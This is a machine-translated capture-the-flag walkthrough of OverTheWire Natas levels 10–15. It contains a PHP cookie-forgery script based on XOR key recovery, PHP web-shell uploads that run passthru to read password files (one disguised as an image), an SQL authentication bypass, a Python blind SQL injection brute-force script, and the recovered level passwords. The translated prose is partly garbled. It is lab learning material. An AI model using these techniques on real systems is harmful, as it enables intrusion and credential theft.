Wargames NATAS (11-15) problem solving essay

Natas Level 10 → Level 11
Tips :cookies Conduct XOR encryption , Then this level must be related to cookies of , So grab the bag and see cookies There was a data, Check source code discovery , as long as "$data[“showpassword”] == yes", Then the password will be printed , Then look at $data This variable , Find out " $data = loadData( $defaultdata); “, Then look at $defaultdata, Find out ” $defaultdata = array( “showpassword”=>“no”, “bgcolor”=>"#ffffff");“ As a parameter to loadData() function , This function gets cookies Medium data Value , Decrypt and return data to $data, And then execute saveSata(), Set up cookies. well , The purpose is to modify " $data[“showpassword”] ==yes”, Then generate the corresponding data value , Replace the original data value , Just OK 了 . Source code is as follows ：

<?php 
$data="ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSRwh6QUcIaAw%3D"; 
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");   
$value1 = json_encode($defaultdata); 

$value2 = base64_decode($data); 
$outText = "";  

//xor_encrypt

for($i=0;$i<strlen($value1);$i++){
    
	$outText .= $value1[$i] ^ $value2[$i % strlen($value2)];
}

echo $outText."\n";
// Output ：qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq!n'!nJq
// By reading xor_encrypt() The function code function is value1 Everyone and $key To engage in exclusive or ,
// So the value with the highest frequency is key,OK, Get $key=qw8J
$outText = "";
$key = "qw8J";
$data2 =array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
$value3 = json_encode($data2);
//xor_encrypt
for($i=0;$i<strlen($value3);$i++){
    
	$outText .= $value3[$i] ^ $key[$i % strlen($key)];
}

echo "\$data[\"showpassword\"] == yes Of cookies:".base64_encode($outText);
//data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK 
?>

And then use it bp modify cookie Of data value , send out GET data , Successfully obtained the password .

username:natas12
password:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
Pass through ！

Natas Level 11 → Level 12
Tips ： Open the page and find that you can upload files , Discover by reading the source code
technological process ： Suppose you upload a file test.jpg

client

Program call genRandomString（） Randomly generate a file name ->

+.jpg ->

form filename Value $_POST[“filename”] -> hypothesis (xxd.jpg)

POST Submitted to the index.php Script ->

Server side

Received POST data , Judge filename Whether there is ->( There is )

Program call makeRandomPathFromFilename(“upload”,“xxd.jpg”) ->$ext=‘jpg’->

Program call makeRandomPath(“upload”,“jpg”) -> “upload/xxb” + “.” + $ext ->

Generate a new path and return to $target_path = “upload/xxb.jpg” ->

Judge the uploaded file test.jpg Whether the number of bytes exceeds 1kb ->

Program call move_uploaded_file() Upload files and move to $target_path -> Finish uploading the file to the server

Summary : Clarify the process , It is found that the file name is only randomly modified and then added ".jpg" suffix , Finally, upload it directly to the server , The file suffix has not been modified , And there's no filtering ,
So let's write one directly php Just upload the script .OK. Create a new one test.txt file , Write the following code :

<?php
passthru ("cat /etc/natas_webpass/natas13");
?>

And then upload , And use burp Intercept request request , Revised as follows :

then forward Continue sending POST data , Back to main page , I found that the document had been uploaded , Finally, click the displayed link to execute php Script , The password is displayed directly

username:natas13
password:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
Pass through ！

Natas Level 12 → Level 13
Tips : This level is roughly the same as Shangguan , There are more than one verification. The uploaded file must be a picture , So I thought of adding the code to the image file , Upload to bypass the verification of the image .
Script files "test.php"

?php
passthru ("cat /etc/natas_webpass/natas14");
?>

Then execute the following command

cat test.jpg test.php > rr.jpg

hold test.jpg and test.php File merge redirect to rr.jpg, Note the new file generated rr.jpg The size cannot exceed 1KB
Then upload the file directly , open burp To intercept , Same as the previous level .jpg by .php suffix

then forward Continue to send POST data , Back to the main page, I found that the submission was successful

then forward Continue sending POST data , Back to main page , I found that the document had been uploaded , Finally, click the displayed link to execute php Script , The password is displayed directly

username:natas14
password:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
Pass through ！

Natas Level 13 → Level 14
Tips : Open the page and find a form , View page source code discovery POST Submit , The analysis process is as follows ：
technological process :
username=natas15 password=

client
POST Submit username and password To index.php

Server side
Accept the submitted data ->

Program call mysql_connect() Function connection mysql database -> Successfully returns mysql Database identification $link

Program call mysql_select_db() Function activation $link Identified database ->

$ query = “SELECT * from users where username= $ _REQUEST[“username”] and password=$_REQUEST[“password”]”;

-> Program call mysql_query() Function execution SQL sentence ->

Program call mysql_num_rows() Function returns the number of rows in the result set ->

If the return value >0 Then print the password ->

close sql Connect

OK！ Clarify the process and find that as long as the structure meets the conditions query sentence , Let return value >0 Just go

original $ query = “SELECT * from users where username=”" .$ _REQUEST[“username”]."" and password="".$_REQUEST[“password”].""";

modify $ query = “SELECT * from users where username =“natas15”–” and password="".$_REQUEST[“password”].""";
The submitted query The sentence becomes ：select *from users where username=“natas15”;
Login with user name directly , Get the password .
username:natas15
password:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
Pass through ！

Natas Level 14 → Level 15
Tips ： Open the link and find that there is only one form , View the source code analysis of the page as follows
technological process :

client
POST Submit username To index.php

Server side
The server receives POST data , Analyze the source code and find username Parameters are used as query conditions , perform SQL sentence , If username Print if there is "This user exists.“ Print if not "This user doesn’t exist.”
Although you can't get the password directly , But you can use the returned result to explode the password . Then write a script to do it automatically POST Submit , Then by returning the result , Burst every character of the password , Finally, splice the password . We know that the number of digits of password and customs is the same, which is composed of upper and lower case letters and numbers , I use it python Write scripts , Other scripting languages can also be used , The principle is the same .
The code is as follows :

import urllib.request
import urllib.parse
import re

url = 'http://natas15.natas.labs.overthewire.org/index.php'
headers = {
    
    'Host': 'natas15.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://natas15.natas.labs.overthewire.org',
    'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas15.natas.labs.overthewire.org/',
    'Cookie': '__utma=176859643.1665848136.1639378791.1639816055.1639908270.13; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = 'natas16" and binary password like "'
n2 = '%"#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pattern = re.compile(r'This user exists')
pwd = ''

for i in range(length):
    for ch in dic:
        name = n1 + pwd + ch + n2
        data = {
    
                'username':name
        }
        postdata=bytes(urllib.parse.urlencode(data),encoding='utf-8')
        print(postdata)
        req=urllib.request.Request(url=url,headers=headers,data=postdata,method='POST')
        response = urllib.request.urlopen(req)
        html = response.read().decode('utf-8')
        if pattern.search(html):
            pwd += ch
            break
print(pwd)

Summary ： The knowledge points of this question are as follows

• python How to write post Submit
• python String splicing
• python The use of regular modules
• header In the parameter "Content-Length", Affect the return result , Delete it
• MYSQL In the sentence LIKE Use ,LIKE Fuzzy query
• MYSQL In the sentence BINARY Use ,BINARY Case sensitive
  username:natas16
  password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
  Pass through ！